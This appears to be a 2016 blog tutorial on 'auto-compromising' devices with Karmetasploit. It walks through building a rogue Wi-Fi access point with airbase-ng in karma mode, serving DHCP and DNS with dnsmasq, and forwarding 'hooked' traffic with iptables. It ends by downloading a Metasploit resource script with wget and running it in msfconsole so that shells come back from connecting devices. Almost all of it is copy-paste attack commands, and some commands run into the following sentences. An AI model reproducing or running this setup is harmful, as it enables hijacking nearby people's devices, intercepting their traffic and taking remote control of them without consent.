March 21, 2016
Auto-Compromising Devices with Karmetasploit
March 21, 2016
sudo apt-get update && apt-get -y upgrade && apt-get -y install vimNext, install dnsmasq. This will be used for DNS resolution and DHCP address handouts:
sudo apt-get -y install dnsmasqOnce it's installed, configure dnsmasq by performing the following:
Update it to include the following at the top:
If you want dnsmasq to listen for DHCP and DNS requests only on specified interfaces (and the loopback) give the name of the interface (eg eth0) here.
Repeat the line for more than one interface.interface=at0
Uncomment this to enable the integrated DHCP server. You need to supply the range of addresses available for lease and optionally a lease time. If you have more than one network, you'll need to repeat this for each network on which you want to supply DHCP service.
dhcp-range=10.10.10.50,10.10.10.150,12hNext, install Aircrack-ng by doing the following:
sudo apt-get -y install aircrack-ngOnce this is in place, you'll need to create the proper rules to forward all "hooked" traffic. You can do this by issuing the following commands:
modprobe iptable_nat iptables -A FORWARD -i wlan0mon -j ACCEPT iptables -A FORWARD -i at0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE echo 1 > /proc/sys/net/ipv4/ip_forwardOkay, time to start hooking devices...Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests. Issue the following command. It will also create a new interface named at0:
airbase-ng -P -C 30 -e "linksys" -v wlan0monIf done properly, you'll see something similar: Open a second terminal window, issue the following to configure the interface on at0:
ifconfig at0 up 10.10.10.1 netmask 255.255.255.0Restart dnsmasq:
service dnsmasq restartFinally, begin autopwning devices by issuing the following command:
cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txtIf done properly, you should see the following:You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser. It should reveal the following: When successful, shells will be returned into the second console window that should be running Karmetasploit. Good luck!